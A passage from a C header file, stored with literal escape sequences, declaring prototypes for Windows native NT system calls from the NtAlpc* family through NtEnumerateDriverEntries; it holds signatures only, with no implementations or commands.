OPTIONAL,\r\n\tIN ULONG DataCount);\r\n\r\nEXTERN_C NTSTATUS NtAlpcAcceptConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN HANDLE ConnectionPortHandle,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,\r\n\tIN PVOID PortContext OPTIONAL,\r\n\tIN PPORT_MESSAGE ConnectionRequest,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES ConnectionMessageAttributes OPTIONAL,\r\n\tIN BOOLEAN AcceptConnection);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCancelMessage(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN PALPC_CONTEXT_ATTR MessageContext);\r\n\r\nEXTERN_C NTSTATUS NtAlpcConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN PUNICODE_STRING PortName,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,\r\n\tIN ULONG Flags,\r\n\tIN PSID RequiredServerSid OPTIONAL,\r\n\tIN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,\r\n\tIN OUT PULONG BufferLength OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcConnectPortEx(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ConnectionPortObjectAttributes,\r\n\tIN POBJECT_ATTRIBUTES ClientPortObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,\r\n\tIN ULONG Flags,\r\n\tIN PSECURITY_DESCRIPTOR ServerSecurityRequirements OPTIONAL,\r\n\tIN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,\r\n\tIN OUT PSIZE_T BufferLength OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreatePort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreatePortSection(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN SIZE_T SectionSize,\r\n\tOUT PHANDLE AlpcSectionHandle,\r\n\tOUT PSIZE_T ActualSectionSize);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreateResourceReserve(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN SIZE_T MessageSize,\r\n\tOUT PHANDLE ResourceId);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreateSectionView(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN OUT PALPC_DATA_VIEW_ATTR ViewAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAlpcCreateSecurityContext(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN OUT PALPC_SECURITY_ATTR SecurityAttribute);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeletePortSection(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE SectionHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeleteResourceReserve(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE ResourceId);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeleteSectionView(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN PVOID ViewBase);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeleteSecurityContext(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE ContextHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDisconnectPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtAlpcImpersonateClientContainerOfPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtAlpcImpersonateClientOfPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message,\r\n\tIN PVOID Flags);\r\n\r\nEXTERN_C NTSTATUS NtAlpcOpenSenderProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE PortMessage,\r\n\tIN ULONG Flags,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAlpcOpenSenderThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE PortMessage,\r\n\tIN ULONG Flags,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAlpcQueryInformation(\r\n\tIN HANDLE PortHandle OPTIONAL,\r\n\tIN ALPC_PORT_INFORMATION_CLASS PortInformationClass,\r\n\tIN OUT PVOID PortInformation,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcQueryInformationMessage(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE PortMessage,\r\n\tIN ALPC_MESSAGE_INFORMATION_CLASS MessageInformationClass,\r\n\tOUT PVOID MessageInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcRevokeSecurityContext(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE ContextHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlpcSendWaitReceivePort(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN PPORT_MESSAGE SendMessage OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,\r\n\tOUT PPORT_MESSAGE ReceiveMessage OPTIONAL,\r\n\tIN OUT PSIZE_T BufferLength OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcSetInformation(\r\n\tIN HANDLE PortHandle,\r\n\tIN ALPC_PORT_INFORMATION_CLASS PortInformationClass,\r\n\tIN PVOID PortInformation OPTIONAL,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtAreMappedFilesTheSame(\r\n\tIN PVOID File1MappedAsAnImage,\r\n\tIN PVOID File2MappedAsFile);\r\n\r\nEXTERN_C NTSTATUS NtAssignProcessToJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtAssociateWaitCompletionPacket(\r\n\tIN HANDLE WaitCompletionPacketHandle,\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN HANDLE TargetObjectHandle,\r\n\tIN PVOID KeyContext OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tIN NTSTATUS IoStatus,\r\n\tIN ULONG_PTR IoStatusInformation,\r\n\tOUT PBOOLEAN AlreadySignaled OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCallEnclave(\r\n\tIN PENCLAVE_ROUTINE Routine,\r\n\tIN PVOID Parameter,\r\n\tIN BOOLEAN WaitForThread,\r\n\tIN OUT PVOID ReturnValue OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCancelIoFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtCancelSynchronousIoFile(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtCancelTimer2(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PT2_CANCEL_PARAMETERS Parameters);\r\n\r\nEXTERN_C NTSTATUS NtCancelWaitCompletionPacket(\r\n\tIN HANDLE WaitCompletionPacketHandle,\r\n\tIN BOOLEAN RemoveSignaledPacket);\r\n\r\nEXTERN_C NTSTATUS NtCommitComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCommitEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCommitRegistryTransaction(\r\n\tIN HANDLE RegistryHandle,\r\n\tIN BOOL Wait);\r\n\r\nEXTERN_C NTSTATUS NtCommitTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN BOOLEAN Wait);\r\n\r\nEXTERN_C NTSTATUS NtCompactKeys(\r\n\tIN ULONG Count,\r\n\tIN HANDLE KeyArray);\r\n\r\nEXTERN_C NTSTATUS NtCompareObjects(\r\n\tIN HANDLE FirstObjectHandle,\r\n\tIN HANDLE SecondObjectHandle);\r\n\r\nEXTERN_C NTSTATUS NtCompareSigningLevels(\r\n\tIN ULONG UnknownParameter1,\r\n\tIN ULONG UnknownParameter2);\r\n\r\nEXTERN_C NTSTATUS NtCompareTokens(\r\n\tIN HANDLE FirstTokenHandle,\r\n\tIN HANDLE SecondTokenHandle,\r\n\tOUT PBOOLEAN Equal);\r\n\r\nEXTERN_C NTSTATUS NtCompleteConnectPort(\r\n\tIN HANDLE PortHandle);\r\n\r\nEXTERN_C NTSTATUS NtCompressKey(\r\n\tIN HANDLE Key);\r\n\r\nEXTERN_C NTSTATUS NtConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN PUNICODE_STRING PortName,\r\n\tIN PSECURITY_QUALITY_OF_SERVICE SecurityQos,\r\n\tIN OUT PPORT_SECTION_WRITE ClientView OPTIONAL,\r\n\tIN OUT PPORT_SECTION_READ ServerView OPTIONAL,\r\n\tOUT PULONG MaxMessageLength OPTIONAL,\r\n\tIN OUT PVOID ConnectionInformation OPTIONAL,\r\n\tIN OUT PULONG ConnectionInformationLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtConvertBetweenAuxiliaryCounterAndPerformanceCounter(\r\n\tIN ULONG UnknownParameter1,\r\n\tIN ULONG UnknownParameter2,\r\n\tIN ULONG UnknownParameter3,\r\n\tIN ULONG UnknownParameter4);\r\n\r\nEXTERN_C NTSTATUS NtCreateDebugObject(\r\n\tOUT PHANDLE DebugObjectHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateDirectoryObject(\r\n\tOUT PHANDLE DirectoryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtCreateDirectoryObjectEx(\r\n\tOUT PHANDLE DirectoryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN HANDLE ShadowDirectoryHandle,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateEnclave(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN ULONG_PTR ZeroBits,\r\n\tIN SIZE_T Size,\r\n\tIN SIZE_T InitialCommitment,\r\n\tIN ULONG EnclaveType,\r\n\tIN PVOID EnclaveInformation,\r\n\tIN ULONG EnclaveInformationLength,\r\n\tOUT PULONG EnclaveError OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateEnlistment(\r\n\tOUT PHANDLE EnlistmentHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN HANDLE TransactionHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN NOTIFICATION_MASK NotificationMask,\r\n\tIN PVOID EnlistmentKey OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateEventPair(\r\n\tOUT PHANDLE EventPairHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateIRTimer(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN ACCESS_MASK DesiredAccess);\r\n\r\nEXTERN_C NTSTATUS NtCreateIoCompletion(\r\n\tOUT PHANDLE IoCompletionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG Count OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateJobObject(\r\n\tOUT PHANDLE JobHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateJobSet(\r\n\tIN ULONG NumJob,\r\n\tIN PJOB_SET_ARRAY UserJobSet,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateKeyTransacted(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG TitleIndex,\r\n\tIN PUNICODE_STRING Class OPTIONAL,\r\n\tIN ULONG CreateOptions,\r\n\tIN HANDLE TransactionHandle,\r\n\tOUT PULONG Disposition OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateKeyedEvent(\r\n\tOUT PHANDLE KeyedEventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateLowBoxToken(\r\n\tOUT PHANDLE TokenHandle,\r\n\tIN HANDLE ExistingTokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PSID PackageSid,\r\n\tIN ULONG CapabilityCount,\r\n\tIN PSID_AND_ATTRIBUTES Capabilities OPTIONAL,\r\n\tIN ULONG HandleCount,\r\n\tIN HANDLE Handles OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateMailslotFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG CreateOptions,\r\n\tIN ULONG MailslotQuota,\r\n\tIN ULONG MaximumMessageSize,\r\n\tIN PLARGE_INTEGER ReadTimeout);\r\n\r\nEXTERN_C NTSTATUS NtCreateMutant(\r\n\tOUT PHANDLE MutantHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN BOOLEAN InitialOwner);\r\n\r\nEXTERN_C NTSTATUS NtCreateNamedPipeFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG ShareAccess,\r\n\tIN ULONG CreateDisposition,\r\n\tIN ULONG CreateOptions,\r\n\tIN BOOLEAN NamedPipeType,\r\n\tIN BOOLEAN ReadMode,\r\n\tIN BOOLEAN CompletionMode,\r\n\tIN ULONG MaximumInstances,\r\n\tIN ULONG InboundQuota,\r\n\tIN ULONG OutboundQuota,\r\n\tIN PLARGE_INTEGER DefaultTimeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreatePagingFile(\r\n\tIN PUNICODE_STRING PageFileName,\r\n\tIN PULARGE_INTEGER MinimumSize,\r\n\tIN PULARGE_INTEGER MaximumSize,\r\n\tIN ULONG Priority);\r\n\r\nEXTERN_C NTSTATUS NtCreatePartition(\r\n\tOUT PHANDLE PartitionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG PreferredNode);\r\n\r\nEXTERN_C NTSTATUS NtCreatePort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG MaxConnectionInfoLength,\r\n\tIN ULONG MaxMessageLength,\r\n\tIN ULONG MaxPoolUsage OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreatePrivateNamespace(\r\n\tOUT PHANDLE NamespaceHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PVOID BoundaryDescriptor);\r\n\r\nEXTERN_C NTSTATUS NtCreateProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ParentProcess,\r\n\tIN BOOLEAN InheritObjectTable,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN HANDLE DebugPort OPTIONAL,\r\n\tIN HANDLE ExceptionPort OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateProfile(\r\n\tOUT PHANDLE ProfileHandle,\r\n\tIN HANDLE Process OPTIONAL,\r\n\tIN PVOID ProfileBase,\r\n\tIN ULONG ProfileSize,\r\n\tIN ULONG BucketSize,\r\n\tIN PULONG Buffer,\r\n\tIN ULONG BufferSize,\r\n\tIN KPROFILE_SOURCE ProfileSource,\r\n\tIN ULONG Affinity);\r\n\r\nEXTERN_C NTSTATUS NtCreateProfileEx(\r\n\tOUT PHANDLE ProfileHandle,\r\n\tIN HANDLE Process OPTIONAL,\r\n\tIN PVOID ProfileBase,\r\n\tIN SIZE_T ProfileSize,\r\n\tIN ULONG BucketSize,\r\n\tIN PULONG Buffer,\r\n\tIN ULONG BufferSize,\r\n\tIN KPROFILE_SOURCE ProfileSource,\r\n\tIN USHORT GroupCount,\r\n\tIN PGROUP_AFFINITY GroupAffinity);\r\n\r\nEXTERN_C NTSTATUS NtCreateRegistryTransaction(\r\n\tOUT PHANDLE Handle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN DWORD Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateResourceManager(\r\n\tOUT PHANDLE ResourceManagerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE TmHandle,\r\n\tIN LPGUID RmGuid,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN PUNICODE_STRING Description OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateSemaphore(\r\n\tOUT PHANDLE SemaphoreHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN LONG InitialCount,\r\n\tIN LONG MaximumCount);\r\n\r\nEXTERN_C NTSTATUS NtCreateSymbolicLinkObject(\r\n\tOUT PHANDLE LinkHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PUNICODE_STRING LinkTarget);\r\n\r\nEXTERN_C NTSTATUS NtCreateThreadEx(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID StartRoutine,\r\n\tIN PVOID Argument OPTIONAL,\r\n\tIN ULONG CreateFlags,\r\n\tIN SIZE_T ZeroBits,\r\n\tIN SIZE_T StackSize,\r\n\tIN SIZE_T MaximumStackSize,\r\n\tIN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateTimer(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN TIMER_TYPE TimerType);\r\n\r\nEXTERN_C NTSTATUS NtCreateTimer2(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN PVOID Reserved1 OPTIONAL,\r\n\tIN PVOID Reserved2 OPTIONAL,\r\n\tIN ULONG Attributes,\r\n\tIN ACCESS_MASK DesiredAccess);\r\n\r\nEXTERN_C NTSTATUS NtCreateToken(\r\n\tOUT PHANDLE TokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN TOKEN_TYPE TokenType,\r\n\tIN PLUID AuthenticationId,\r\n\tIN PLARGE_INTEGER ExpirationTime,\r\n\tIN PTOKEN_USER User,\r\n\tIN PTOKEN_GROUPS Groups,\r\n\tIN PTOKEN_PRIVILEGES Privileges,\r\n\tIN PTOKEN_OWNER Owner OPTIONAL,\r\n\tIN PTOKEN_PRIMARY_GROUP PrimaryGroup,\r\n\tIN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,\r\n\tIN PTOKEN_SOURCE TokenSource);\r\n\r\nEXTERN_C NTSTATUS NtCreateTokenEx(\r\n\tOUT PHANDLE TokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN TOKEN_TYPE TokenType,\r\n\tIN PLUID AuthenticationId,\r\n\tIN PLARGE_INTEGER ExpirationTime,\r\n\tIN PTOKEN_USER User,\r\n\tIN PTOKEN_GROUPS Groups,\r\n\tIN PTOKEN_PRIVILEGES Privileges,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION UserAttributes OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION DeviceAttributes OPTIONAL,\r\n\tIN PTOKEN_GROUPS DeviceGroups OPTIONAL,\r\n\tIN PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy OPTIONAL,\r\n\tIN PTOKEN_OWNER Owner OPTIONAL,\r\n\tIN PTOKEN_PRIMARY_GROUP PrimaryGroup,\r\n\tIN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,\r\n\tIN PTOKEN_SOURCE TokenSource);\r\n\r\nEXTERN_C NTSTATUS NtCreateTransaction(\r\n\tOUT PHANDLE TransactionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN LPGUID Uow OPTIONAL,\r\n\tIN HANDLE TmHandle OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN ULONG IsolationLevel OPTIONAL,\r\n\tIN ULONG IsolationFlags OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tIN PUNICODE_STRING Description OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateTransactionManager(\r\n\tOUT PHANDLE TmHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PUNICODE_STRING LogFileName OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN ULONG CommitStrength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateUserProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK ProcessDesiredAccess,\r\n\tIN ACCESS_MASK ThreadDesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ProcessObjectAttributes OPTIONAL,\r\n\tIN POBJECT_ATTRIBUTES ThreadObjectAttributes OPTIONAL,\r\n\tIN ULONG ProcessFlags,\r\n\tIN ULONG ThreadFlags,\r\n\tIN PVOID ProcessParameters OPTIONAL,\r\n\tIN OUT PPS_CREATE_INFO CreateInfo,\r\n\tIN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateWaitCompletionPacket(\r\n\tOUT PHANDLE WaitCompletionPacketHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateWaitablePort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG MaxConnectionInfoLength,\r\n\tIN ULONG MaxMessageLength,\r\n\tIN ULONG MaxPoolUsage OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateWnfStateName(\r\n\tOUT PCWNF_STATE_NAME StateName,\r\n\tIN WNF_STATE_NAME_LIFETIME NameLifetime,\r\n\tIN WNF_DATA_SCOPE DataScope,\r\n\tIN BOOLEAN PersistData,\r\n\tIN PCWNF_TYPE_ID TypeId OPTIONAL,\r\n\tIN ULONG MaximumStateSize,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor);\r\n\r\nEXTERN_C NTSTATUS NtCreateWorkerFactory(\r\n\tOUT PHANDLE WorkerFactoryHandleReturn,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE CompletionPortHandle,\r\n\tIN HANDLE WorkerProcessHandle,\r\n\tIN PVOID StartRoutine,\r\n\tIN PVOID StartParameter OPTIONAL,\r\n\tIN ULONG MaxThreadCount OPTIONAL,\r\n\tIN SIZE_T StackReserve OPTIONAL,\r\n\tIN SIZE_T StackCommit OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDebugActiveProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE DebugObjectHandle);\r\n\r\nEXTERN_C NTSTATUS NtDebugContinue(\r\n\tIN HANDLE DebugObjectHandle,\r\n\tIN PCLIENT_ID ClientId,\r\n\tIN NTSTATUS ContinueStatus);\r\n\r\nEXTERN_C NTSTATUS NtDeleteAtom(\r\n\tIN USHORT Atom);\r\n\r\nEXTERN_C NTSTATUS NtDeleteBootEntry(\r\n\tIN ULONG Id);\r\n\r\nEXTERN_C NTSTATUS NtDeleteDriverEntry(\r\n\tIN ULONG Id);\r\n\r\nEXTERN_C NTSTATUS NtDeleteFile(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtDeleteKey(\r\n\tIN HANDLE KeyHandle);\r\n\r\nEXTERN_C NTSTATUS NtDeleteObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN BOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtDeletePrivateNamespace(\r\n\tIN HANDLE NamespaceHandle);\r\n\r\nEXTERN_C NTSTATUS NtDeleteValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING ValueName);\r\n\r\nEXTERN_C NTSTATUS NtDeleteWnfStateData(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PVOID ExplicitScope OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDeleteWnfStateName(\r\n\tIN PCWNF_STATE_NAME StateName);\r\n\r\nEXTERN_C NTSTATUS NtDisableLastKnownGood();\r\n\r\nEXTERN_C NTSTATUS NtDisplayString(\r\n\tIN PUNICODE_STRING String);\r\n\r\nEXTERN_C NTSTATUS NtDrawText(\r\n\tIN PUNICODE_STRING String);\r\n\r\nEXTERN_C NTSTATUS NtEnableLastKnownGood();\r\n\r\nEXTERN_C NTSTATUS NtEnumerateBootEntries(\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN OUT PULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateDriverEntries(\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN OUT PULONG BufferLength);\r\n\r\nEXTERN_C 